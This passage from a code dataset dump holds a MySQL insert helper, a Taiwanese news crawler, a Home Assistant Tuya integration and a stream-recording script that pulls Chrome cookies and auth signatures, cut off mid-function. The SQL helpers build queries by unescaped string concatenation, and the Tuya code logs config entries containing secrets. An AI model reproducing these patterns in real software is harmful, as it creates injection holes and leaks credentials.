`\"+table_name+\"`(`PhotoID`) VALUES ('\" + str(photo_id) + \"')\"\r\n cursor.execute(sql)\r\n connection.commit()\r\n\r\n @staticmethod\r\n def sql_insert_photo(connection, filename, file_extension, description):\r\n with connection.cursor() as cursor:\r\n sql = \"INSERT INTO `photos`(`PhotoID`, `filename`, `file extension`, `description`)\" + \\\r\n \"VALUES (null,'\"+filename+\"','\"+file_extension\r\n\r\n if description is None:\r\n sql = sql + \"', null )\"\r\n else:\r\n sql = sql + \"','\" + description + \" ')\"\r\n\r\n try:\r\n cursor.execute(sql)\r\n except Exception as e:\r\n logging.warning(\"Exception is :\" + str(e) + \"\\n\"+filename+\"\\n\"+file_extension+\"\\n\"+description)\r\n\r\n connection.commit()\r\n\r\n @staticmethod\r\n def sql_assign_photo_to_artist(connection, photo_id, artist_id):\r\n table_name = \"photos_to_artists\"\r\n with connection.cursor() as cursor:\r\n sql = \"INSERT INTO `\" + table_name + \"`(`PhotoID`, `ArtistID`)\" + \\\r\n \" VALUES ('\"+str(photo_id)+\"','\" + str(artist_id) + \"')\"\r\n cursor.execute(sql)\r\n connection.commit()\r\n\r\n @staticmethod\r\n def sql_assign_photo_to_genres(connection, photo_id, genre_id):\r\n table_name = \"photos_to_genres\"\r\n with connection.cursor() as cursor:\r\n sql = \"INSERT INTO `\" + table_name + \"`(`PhotoID`, `GenreID`)\" + \\\r\n \" VALUES ('\"+str(photo_id)+\"','\" + str(genre_id) + \"')\"\r\n cursor.execute(sql)\r\n connection.commit()\r\n\r\n @staticmethod\r\n def sql_insert_artist(connection, NameSurname, websiteURL, artstationURL, deviantartURL, InstagramURL, TumblrURL):\r\n table_name = \"artists\"\r\n with connection.cursor() as cursor:\r\n sql = \"INSERT INTO `\"+table_name+\"`\" \\\r\n \"(`ArtistID`, `NameSurname`, `websiteURL`, `artstationURL`, `deviantartURL`, `InstagramURL`, `TumblrURL`)\"+\\\r\n \" VALUES 
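The insert helpers above splice values straight into the SQL string, which breaks on quotes in the data (the try/except around `sql_insert_photo` hints at that) and is open to injection. A sketch of the `used_photos` insert using placeholders, assuming a PyMySQL-style driver where `%s` is the parameter marker:

def sql_insert_used_photos(connection, photo_id):
    # The driver quotes/escapes the value; the SQL text stays constant.
    with connection.cursor() as cursor:
        cursor.execute(
            "INSERT INTO `used_photos` (`PhotoID`) VALUES (%s)",
            (photo_id,),
        )
    connection.commit()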
(null,'\"+NameSurname+\"','\"+websiteURL+\"','\"+artstationURL+\"','\"+deviantartURL+\"','\"+InstagramURL+\"','\"+TumblrURL+\"')\"\r\n cursor.execute(sql)\r\n connection.commit()\r\n", "sub_path": "DBItemAdder.py", "file_name": "DBItemAdder.py", "file_ext": "py", "file_size_in_byte": 2583, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.warning", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "617874226", "text": "# local Django\nfrom newsdb.models import New\n\n# third-party\nfrom bs4 import BeautifulSoup\nimport requests\nimport pytz\n\n# standard library\nfrom datetime import datetime, date\nimport re\n\nclass NewtalkCrawler:\n\n def __init__(self):\n self.subjects = {\n '2/政治': 2,\n '1/國際': 3,\n '4/司法': 1,\n '14/社會': 1,\n '3/財經': 4,\n '7/中國': 6,\n '5/生活': 7,\n '102/體育': 5,\n }\n\n def get_news_info (self, url, sub, date):\n soup = self.get_news_soup(url)\n if soup != None:\n return {\n 'brand_id': 15,\n 'sub_id': self.subjects[sub],\n 'url': url,\n 'title': self.get_title(soup),\n 'content': self.get_content(soup),\n 'date': date,\n 'author': self.get_author(soup),\n }\n else:\n return None\n\n def get_news_soup (self, url):\n try:\n res = requests.get(url, timeout=10, headers={'User-Agent': 'Mozilla/5.0'})\n res.encoding = res.apparent_encoding\n soup = BeautifulSoup(res.text, 'lxml')\n return soup\n except:\n print( 'error in get_news_soup' )\n return None\n\n def get_title (self, soup):\n try:\n title = soup.find('h1', class_='content_title').get_text()\n return \"\".join( title.split() )\n except:\n return None\n\n def get_author (self, soup):\n try:\n author = soup.find('div', class_='content_reporter').find('a').get_text()\n return author\n except:\n return None\n\n def get_content (self, soup):\n try:\n news_DOM = soup.find('div', {'itemprop': 'articleBody'}).contents\n content = ''\n for DOM in news_DOM:\n if DOM.name == 'p':\n content += DOM.get_text()\n return \"\".join( content.split() )[:2000]\n except Exception as e:\n print( 'error in get_content' )\n print(e)\n return None\n\n def get_url_by_date(self, sub, date):\n flag = True\n url_category = []\n for page in range(1, 10):\n try:\n res = requests.get('https://newtalk.tw/news/subcategory/%s/%d' % (sub, page), timeout=10, headers={'User-Agent': 'Mozilla/5.0'})\n res.encoding = res.apparent_encoding\n soup = BeautifulSoup(res.text, 'lxml')\n except Exception as e:\n print( e )\n print( 'error in get news categoty' )\n continue\n\n news_category_DOM = soup.find_all('div', class_='news_box1')\n for news_DOM in news_category_DOM:\n try:\n url = news_DOM.find('div', class_='news-title').find('a')['href']\n news_date = re.search( r'https://newtalk.tw/news/(.*)/(.*)/(.*)', url ).group(2)\n\n if datetime.strptime(news_date, '%Y-%m-%d').date() > date:\n continue\n elif datetime.strptime(news_date, '%Y-%m-%d').date() == date:\n url_category.append( url )\n else:\n flag = False\n break\n\n except Exception as e:\n print( 'error in crawling news category' )\n print( e )\n continue\n \n if flag == False:\n break\n\n news_category_DOM = soup.find('div', id='category').find_all('div', class_='news-list-item')\n for news_DOM in news_category_DOM:\n try:\n url = news_DOM.find('div', class_='news_title').find('a')['href']\n news_date = re.search( r'https://newtalk.tw/news/(.*)/(.*)/(.*)', url ).group(2)\n\n if datetime.strptime(news_date, '%Y-%m-%d').date() > date:\n continue\n elif datetime.strptime(news_date, '%Y-%m-%d').date() == date:\n 
url_category.append( url )\n else:\n flag = False\n break\n\n except Exception as e:\n print( 'error in crawling news gategory' )\n print( e )\n continue\n \n if flag == False:\n break\n return url_category\n\n def get_news_today( self ):\n timezone = pytz.timezone('Asia/Taipei')\n date_today = datetime.now(timezone).date()\n\n return self.get_news_by_date( [str(date_today)] )\n\n def get_news_by_date(self, date_list):\n news_list = []\n for date in date_list:\n for sub in self.subjects:\n url_list = self.get_url_by_date( sub, datetime.strptime(date, '%Y-%m-%d').date() )\n for url in url_list:\n temp_news = self.get_news_info( url, sub, str(date) )\n news_list.append( temp_news )\n\n return news_list\n\n def insert_news( self, newsList ):\n for news in newsList:\n try:\n temp_news = New.objects.filter(url=news['url'])\n if len(temp_news) == 0:\n tmp = New(\n title=news['title'],\n content= news['content'],\n author= news['author'],\n brand_id=news['brand_id'],\n sub_id= news['sub_id'],\n date=news['date'],\n url=news['url'],\n )\n tmp.save()\n except Exception as e:\n print( e )\n return True", "sub_path": "DisInV/crawler/dimestic_news_apis/newtalk_api.py", "file_name": "newtalk_api.py", "file_ext": "py", "file_size_in_byte": 5831, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "datetime.date", "line_number": 36, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 44, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 46, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 84, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 86, "usage_type": "call"}, {"api_name": "re.search", "line_number": 96, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 98, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 98, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 98, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 100, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 100, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 100, "usage_type": "name"}, {"api_name": "re.search", "line_number": 118, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 120, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 120, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 120, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 122, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 122, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 122, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 138, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 139, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 139, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 145, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 147, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 147, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 147, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 149, "usage_type": "argument"}, {"api_name": "newsdb.models.New.objects.filter", "line_number": 157, "usage_type": "call"}, {"api_name": 
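`get_url_by_date` above runs the same `re.search`/`strptime` pair in two loops; pulling it into one helper keeps the date comparison in a single place. A sketch with an invented helper name and a tightened pattern:

import re
from datetime import datetime, date

URL_DATE = re.compile(r"https://newtalk\.tw/news/.+?/(\d{4}-\d{2}-\d{2})/")

def date_from_url(url):
    # Returns the article date embedded in the URL, or None on no match.
    m = URL_DATE.search(url)
    return datetime.strptime(m.group(1), "%Y-%m-%d").date() if m else None

assert date_from_url("https://newtalk.tw/news/view/2021-05-01/12345") == date(2021, 5, 1)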
"newsdb.models.New.objects", "line_number": 157, "usage_type": "attribute"}, {"api_name": "newsdb.models.New", "line_number": 157, "usage_type": "name"}, {"api_name": "newsdb.models.New", "line_number": 159, "usage_type": "call"}]} +{"seq_id": "159385604", "text": "#!/usr/bin/env python3\n\"\"\"Support for Tuya Smart devices.\"\"\"\n\nimport itertools\nimport logging\nfrom typing import Any\n\nfrom tuya_iot import (\n ProjectType,\n TuyaDevice,\n TuyaDeviceListener,\n TuyaDeviceManager,\n TuyaHomeManager,\n TuyaOpenAPI,\n TuyaOpenMQ,\n tuya_logger,\n)\nimport voluptuous as vol\n\nfrom homeassistant.config_entries import SOURCE_IMPORT, ConfigEntry\nfrom homeassistant.core import HomeAssistant\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.helpers.dispatcher import async_dispatcher_send\n\nfrom .const import (\n CONF_ACCESS_ID,\n CONF_ACCESS_SECRET,\n CONF_APP_TYPE,\n CONF_COUNTRY_CODE,\n CONF_ENDPOINT,\n CONF_PASSWORD,\n CONF_PROJECT_TYPE,\n CONF_USERNAME,\n DOMAIN,\n TUYA_DEVICE_MANAGER,\n TUYA_DISCOVERY_NEW,\n TUYA_HA_DEVICES,\n TUYA_HA_TUYA_MAP,\n TUYA_MQTT_LISTENER,\n TUYA_SETUP_PLATFORM,\n TUYA_SUPPORT_HA_TYPE,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\nCONFIG_SCHEMA = vol.Schema(\n vol.All(\n cv.deprecated(DOMAIN),\n {\n DOMAIN: vol.Schema(\n {\n vol.Required(CONF_PROJECT_TYPE): int,\n vol.Required(CONF_ENDPOINT): cv.string,\n vol.Required(CONF_ACCESS_ID): cv.string,\n vol.Required(CONF_ACCESS_SECRET): cv.string,\n CONF_USERNAME: cv.string,\n CONF_PASSWORD: cv.string,\n CONF_COUNTRY_CODE: cv.string,\n CONF_APP_TYPE: cv.string,\n }\n )\n },\n ),\n extra=vol.ALLOW_EXTRA,\n)\n\n\nasync def _init_tuya_sdk(hass: HomeAssistant, entry: ConfigEntry) -> bool:\n entry_data = entry.data\n project_type = ProjectType(entry_data[CONF_PROJECT_TYPE])\n api = TuyaOpenAPI(\n entry_data[CONF_ENDPOINT],\n entry_data[CONF_ACCESS_ID],\n entry_data[CONF_ACCESS_SECRET],\n project_type,\n )\n\n api.set_dev_channel(\"hass\")\n\n response = (\n await hass.async_add_executor_job(\n api.login, entry_data[CONF_USERNAME], entry_data[CONF_PASSWORD]\n )\n if project_type == ProjectType.INDUSTY_SOLUTIONS\n else await hass.async_add_executor_job(\n api.login,\n entry_data[CONF_USERNAME],\n entry_data[CONF_PASSWORD],\n entry_data[CONF_COUNTRY_CODE],\n entry_data[CONF_APP_TYPE],\n )\n )\n if response.get(\"success\", False) is False:\n _LOGGER.error(\n f\"Tuya login error response: {response}\"\n )\n return False\n\n tuya_mq = TuyaOpenMQ(api)\n tuya_mq.start()\n\n device_manager = TuyaDeviceManager(api, tuya_mq)\n\n # Get device list\n home_manager = TuyaHomeManager(api, tuya_mq, device_manager)\n await hass.async_add_executor_job(home_manager.update_device_cache)\n\n class DeviceListener(TuyaDeviceListener):\n \"\"\"Device Update Listener.\"\"\"\n\n def update_device(self, device: TuyaDevice):\n for ha_device in hass.data[DOMAIN][TUYA_HA_DEVICES]:\n if ha_device.tuya_device.id == device.id:\n _LOGGER.debug(\n f\"_update-->{self};->>{ha_device.tuya_device.status}\"\n )\n ha_device.schedule_update_ha_state()\n\n def add_device(self, device: TuyaDevice):\n\n device_add = False\n\n _LOGGER.info(\n f\"\"\"add device category->{device.category}; keys->,\n {hass.data[DOMAIN][TUYA_HA_TUYA_MAP].keys()}\"\"\"\n )\n if device.category in itertools.chain(\n *hass.data[DOMAIN][TUYA_HA_TUYA_MAP].values()\n ):\n ha_tuya_map = hass.data[DOMAIN][TUYA_HA_TUYA_MAP]\n\n remove_hass_device(hass, device.id)\n\n for key, tuya_list in ha_tuya_map.items():\n if device.category in tuya_list:\n device_add = True\n 
async_dispatcher_send(\n hass, TUYA_DISCOVERY_NEW.format(key), [device.id]\n )\n\n if device_add:\n device_manager = hass.data[DOMAIN][TUYA_DEVICE_MANAGER]\n device_manager.mq.stop()\n tuya_mq = TuyaOpenMQ(device_manager.api)\n tuya_mq.start()\n\n device_manager.mq = tuya_mq\n tuya_mq.add_message_listener(device_manager._onMessage)\n\n def remove_device(self, id: str):\n _LOGGER.info(f\"tuya remove device:{id}\")\n remove_hass_device(hass, id)\n\n __listener = DeviceListener()\n hass.data[DOMAIN][TUYA_MQTT_LISTENER] = __listener\n device_manager.add_device_listener(__listener)\n hass.data[DOMAIN][TUYA_DEVICE_MANAGER] = device_manager\n\n # Clean up device entities\n await cleanup_device_registry(hass)\n\n _LOGGER.info(f\"init support type->{TUYA_SUPPORT_HA_TYPE}\")\n\n for platform in TUYA_SUPPORT_HA_TYPE:\n _LOGGER.info(f\"tuya async platform-->{platform}\")\n hass.async_create_task(\n hass.config_entries.async_forward_entry_setup(entry, platform)\n )\n hass.data[DOMAIN][TUYA_SETUP_PLATFORM].add(platform)\n\n return True\n\n\nasync def cleanup_device_registry(hass: HomeAssistant):\n \"\"\"Remove deleted device registry entry if there are no remaining entities.\"\"\"\n\n device_registry = hass.helpers.device_registry.async_get(hass)\n device_manager = hass.data[DOMAIN][TUYA_DEVICE_MANAGER]\n\n for dev_id, device_entity in list(device_registry.devices.items()):\n for item in device_entity.identifiers:\n if DOMAIN == item[0] and item[1] not in device_manager.device_map.keys():\n device_registry.async_remove_device(dev_id)\n break\n\n\ndef remove_hass_device(hass: HomeAssistant, device_id: str):\n \"\"\"Remove device from hass cache.\"\"\"\n device_registry = hass.helpers.device_registry.async_get(hass)\n entity_registry = hass.helpers.entity_registry.async_get(hass)\n for entity in list(entity_registry.entities.values()):\n if entity.unique_id.startswith(f\"ty{device_id}\"):\n entity_registry.async_remove(entity.entity_id)\n if device_registry.async_get(entity.device_id):\n device_registry.async_remove_device(entity.device_id)\n\n\nasync def async_setup(hass, config):\n \"\"\"Set up the Tuya integration.\"\"\"\n tuya_logger.setLevel(_LOGGER.level)\n conf = config.get(DOMAIN)\n\n _LOGGER.info(f\"Tuya async setup conf {conf}\")\n if conf is not None:\n\n async def flow_init() -> Any:\n try:\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": SOURCE_IMPORT}, data=conf\n )\n except Exception as inst:\n _LOGGER.error(inst.args)\n _LOGGER.info(\"Tuya async setup flow_init\")\n return result\n\n hass.async_create_task(flow_init())\n\n return True\n\n\nasync def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry):\n \"\"\"Unloading the Tuya platforms.\"\"\"\n _LOGGER.info(\"integration unload\")\n unload = await hass.config_entries.async_unload_platforms(\n entry, hass.data[DOMAIN][\"setup_platform\"]\n )\n if unload:\n __device_manager = hass.data[DOMAIN][TUYA_DEVICE_MANAGER]\n __device_manager.mq.stop()\n __device_manager.remove_device_listener(hass.data[DOMAIN][TUYA_MQTT_LISTENER])\n\n hass.data.pop(DOMAIN)\n\n return unload\n\n\nasync def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry):\n \"\"\"Async setup hass config entry.\"\"\"\n _LOGGER.info(f\"tuya.__init__.async_setup_entry-->{entry.data}\")\n\n hass.data[DOMAIN] = {TUYA_HA_TUYA_MAP: {}, TUYA_HA_DEVICES: []}\n hass.data[DOMAIN][TUYA_SETUP_PLATFORM] = set()\n\n success = await _init_tuya_sdk(hass, entry)\n if not success:\n return False\n\n return True\n", "sub_path": 
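`add_device` above checks category membership with `itertools.chain(*...values())`, flattening the platform-to-categories map lazily on each call; a tiny standalone illustration of the idiom (the mapping contents here are made up):

import itertools

ha_tuya_map = {"switch": ["kg", "cz"], "light": ["dj", "dd"]}

category = "dj"
print(category in itertools.chain(*ha_tuya_map.values()))  # True
# chain() yields "kg", "cz", "dj", ... and stops as soon as "dj" is found.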
"custom_components/tuya_v2/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 7913, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 44, "usage_type": "call"}, {"api_name": "voluptuous.Schema", "line_number": 46, "usage_type": "call"}, {"api_name": "voluptuous.All", "line_number": 47, "usage_type": "call"}, {"api_name": "homeassistant.helpers.config_validation.deprecated", "line_number": 48, "usage_type": "call"}, {"api_name": "const.DOMAIN", "line_number": 48, "usage_type": "argument"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 48, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 50, "usage_type": "name"}, {"api_name": "voluptuous.Schema", "line_number": 50, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 52, "usage_type": "call"}, {"api_name": "const.CONF_PROJECT_TYPE", "line_number": 52, "usage_type": "argument"}, {"api_name": "voluptuous.Required", "line_number": 53, "usage_type": "call"}, {"api_name": "const.CONF_ENDPOINT", "line_number": 53, "usage_type": "argument"}, {"api_name": "voluptuous.Required", "line_number": 54, "usage_type": "call"}, {"api_name": "const.CONF_ACCESS_ID", "line_number": 54, "usage_type": "argument"}, {"api_name": "voluptuous.Required", "line_number": 55, "usage_type": "call"}, {"api_name": "const.CONF_ACCESS_SECRET", "line_number": 55, "usage_type": "argument"}, {"api_name": "const.CONF_USERNAME", "line_number": 56, "usage_type": "name"}, {"api_name": "const.CONF_PASSWORD", "line_number": 57, "usage_type": "name"}, {"api_name": "const.CONF_COUNTRY_CODE", "line_number": 58, "usage_type": "name"}, {"api_name": "const.CONF_APP_TYPE", "line_number": 59, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 53, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 53, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 54, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 54, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 55, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 55, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 56, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 56, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 57, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 57, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 58, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 58, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 59, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 59, "usage_type": "name"}, {"api_name": "voluptuous.ALLOW_EXTRA", "line_number": 64, "usage_type": "attribute"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 68, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 68, 
"usage_type": "name"}, {"api_name": "tuya_iot.ProjectType", "line_number": 70, "usage_type": "call"}, {"api_name": "const.CONF_PROJECT_TYPE", "line_number": 70, "usage_type": "name"}, {"api_name": "tuya_iot.TuyaOpenAPI", "line_number": 71, "usage_type": "call"}, {"api_name": "const.CONF_ENDPOINT", "line_number": 72, "usage_type": "name"}, {"api_name": "const.CONF_ACCESS_ID", "line_number": 73, "usage_type": "name"}, {"api_name": "const.CONF_ACCESS_SECRET", "line_number": 74, "usage_type": "name"}, {"api_name": "tuya_iot.ProjectType.INDUSTY_SOLUTIONS", "line_number": 84, "usage_type": "attribute"}, {"api_name": "tuya_iot.ProjectType", "line_number": 84, "usage_type": "name"}, {"api_name": "const.CONF_USERNAME", "line_number": 82, "usage_type": "name"}, {"api_name": "const.CONF_PASSWORD", "line_number": 82, "usage_type": "name"}, {"api_name": "const.CONF_USERNAME", "line_number": 87, "usage_type": "name"}, {"api_name": "const.CONF_PASSWORD", "line_number": 88, "usage_type": "name"}, {"api_name": "const.CONF_COUNTRY_CODE", "line_number": 89, "usage_type": "name"}, {"api_name": "const.CONF_APP_TYPE", "line_number": 90, "usage_type": "name"}, {"api_name": "tuya_iot.TuyaOpenMQ", "line_number": 99, "usage_type": "call"}, {"api_name": "tuya_iot.TuyaDeviceManager", "line_number": 102, "usage_type": "call"}, {"api_name": "tuya_iot.TuyaHomeManager", "line_number": 105, "usage_type": "call"}, {"api_name": "tuya_iot.TuyaDeviceListener", "line_number": 108, "usage_type": "name"}, {"api_name": "tuya_iot.TuyaDevice", "line_number": 111, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 112, "usage_type": "name"}, {"api_name": "const.TUYA_HA_DEVICES", "line_number": 112, "usage_type": "name"}, {"api_name": "tuya_iot.TuyaDevice", "line_number": 119, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 125, "usage_type": "name"}, {"api_name": "const.TUYA_HA_TUYA_MAP", "line_number": 125, "usage_type": "name"}, {"api_name": "itertools.chain", "line_number": 127, "usage_type": "call"}, {"api_name": "const.DOMAIN", "line_number": 128, "usage_type": "name"}, {"api_name": "const.TUYA_HA_TUYA_MAP", "line_number": 128, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 130, "usage_type": "name"}, {"api_name": "const.TUYA_HA_TUYA_MAP", "line_number": 130, "usage_type": "name"}, {"api_name": "homeassistant.helpers.dispatcher.async_dispatcher_send", "line_number": 137, "usage_type": "call"}, {"api_name": "const.TUYA_DISCOVERY_NEW.format", "line_number": 138, "usage_type": "call"}, {"api_name": "const.TUYA_DISCOVERY_NEW", "line_number": 138, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 142, "usage_type": "name"}, {"api_name": "const.TUYA_DEVICE_MANAGER", "line_number": 142, "usage_type": "name"}, {"api_name": "tuya_iot.TuyaOpenMQ", "line_number": 144, "usage_type": "call"}, {"api_name": "const.DOMAIN", "line_number": 155, "usage_type": "name"}, {"api_name": "const.TUYA_MQTT_LISTENER", "line_number": 155, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 157, "usage_type": "name"}, {"api_name": "const.TUYA_DEVICE_MANAGER", "line_number": 157, "usage_type": "name"}, {"api_name": "const.TUYA_SUPPORT_HA_TYPE", "line_number": 162, "usage_type": "name"}, {"api_name": "const.TUYA_SUPPORT_HA_TYPE", "line_number": 164, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 169, "usage_type": "name"}, {"api_name": "const.TUYA_SETUP_PLATFORM", "line_number": 169, "usage_type": "name"}, {"api_name": "homeassistant.core.HomeAssistant", 
"line_number": 174, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 178, "usage_type": "name"}, {"api_name": "const.TUYA_DEVICE_MANAGER", "line_number": 178, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 182, "usage_type": "name"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 187, "usage_type": "name"}, {"api_name": "tuya_iot.tuya_logger.setLevel", "line_number": 200, "usage_type": "call"}, {"api_name": "tuya_iot.tuya_logger", "line_number": 200, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 201, "usage_type": "argument"}, {"api_name": "const.DOMAIN", "line_number": 209, "usage_type": "argument"}, {"api_name": "homeassistant.config_entries.SOURCE_IMPORT", "line_number": 209, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 206, "usage_type": "name"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 221, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 221, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 225, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 228, "usage_type": "name"}, {"api_name": "const.TUYA_DEVICE_MANAGER", "line_number": 228, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 230, "usage_type": "name"}, {"api_name": "const.TUYA_MQTT_LISTENER", "line_number": 230, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 232, "usage_type": "argument"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 237, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 237, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 241, "usage_type": "name"}, {"api_name": "const.TUYA_HA_TUYA_MAP", "line_number": 241, "usage_type": "name"}, {"api_name": "const.TUYA_HA_DEVICES", "line_number": 241, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 242, "usage_type": "name"}, {"api_name": "const.TUYA_SETUP_PLATFORM", "line_number": 242, "usage_type": "name"}]} +{"seq_id": "52073765", "text": "import requests\nimport time\nimport threading\nimport sys\nimport browsercookie\n\n# Values to be customised #\nbase_url = '' # base url of the stream\nserver = ''\nbase_time = 1800 # time in seconds to record for\nname = \"Stream\" # video file name\ncookie = \"\"\n# *********************** #\n\nheaders = {'Cookie' : cookie, 'Accept' : '*/*', 'Accept-Encoding' : 'gzip, deflate, sdch', 'Accept-Language' : 'en-US,en;q=0.8', 'Connection' : 'keep-alive', 'Host' : '', 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36'}\ncj = browsercookie.chrome()\n\nurl1 = \"\"\nr = requests.get(url1, headers=headers, cookies=cj)\n\nfirst_wmsAuthSign = r.text.split(\"$sig = \")[1].split(\"\\\"\")[1]\n\nurl2 = base_url + 'playlist.m3u8' + first_wmsAuthSign\nr = requests.get(url2, headers=headers, cookies=cj)\n\nsplit = r.text.split(\"nimblesessionid=\")[1]\nsessionId = split.split(\"&\")[0]\nwmsAuthSign = split.split(\"wmsAuthSign=\")[1]\n\nheaders = {'Cookie' : cookie, 'Accept' : '*/*', 'Accept-Encoding' : 'gzip, deflate, sdch', 'Accept-Language' : 'en-US,en;q=0.8', 'Connection' : 'keep-alive', 'Host' : server, 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36'}\npayload = {'nimblesessionid' : sessionId, 'wmsAuthSign' : wmsAuthSign}\n\nurl_list = 
[]\n\ndata = []\n\nlock = threading.Lock()\n\nstopped = False\n\ndef time_passed(oldepoch):\n return (time.time() - oldepoch) >= base_time\n\ndef build_list():\n\turl = base_url + 'chunks.m3u8'\n\ttry:\n\t\tr = requests.get(url, params=payload, headers=headers)\n\t\tsplit = r.text.split(\"#EXTINF:4.004,\")\n\t\tfirst = split[1].split('?')[0].strip()\n\t\tsecond = split[2].split('?')[0].strip()\n\t\tthird = split[3].split('?')[0].strip()\n\texcept:\n\t\tprint (\"\\nError: Make sure sessionId, wmsAuthSign, and base_url are correct!\\n\")\n\telse:\n\t\twith lock:\n\t\t\tif first not in url_list:\n\t\t\t\turl_list.append(first)\n\t\t\tif second not in url_list:\n\t\t\t\turl_list.append(second)\n\t\t\tif third not in url_list:\n\t\t\t\turl_list.append(third)\n\t\t\tprint (\"\\nDownload queue: \" + str(len(url_list)))\n\t\t\treturn len(url_list)\n\ndef download_url():\n\n\ttmp_data = []\n\n\tpart = ''\n\twith lock:\n\t\tif (len(url_list) < 1):\n\t\t\treturn\n\t\tpart = url_list[0]\n\turl = base_url + part\n\n\t# NOTE the stream=True parameter\n\tr = requests.get(url, params=payload, headers=headers, stream=True)\n\n\tfor chunk in r.iter_content(chunk_size=1024):\n\t\tif chunk:\n\t\t\ttmp_data.append(chunk)\n\n\tlength = len(tmp_data)\n\n\tprint (\"\\nDownloading\")\n\tprint (\"Size (x1024): \" + str(length))\n\n\t# If the download failed\n\tif length == 1:\n\t\tdownload_url()\n\telse:\n\t\turl_list.pop(0)\n\n\tfor chunk in tmp_data:\n\t\tdata.append(chunk)\n\ndef save_data(name):\n\twith open(name + '.avi', 'wb') as f:\n\t\tfor chunk in data:\n\t\t\tf.write(chunk)\n\n\ndef list_worker():\n\tglobal stopped\n\ttimestamp = time.time()\n\twhile not stopped and not time_passed(timestamp):\n\t\ttime.sleep(5)\n\t\tbuild_list()\n\tstopped = True # Set stopped to true so stop_worker quits\n\ndef 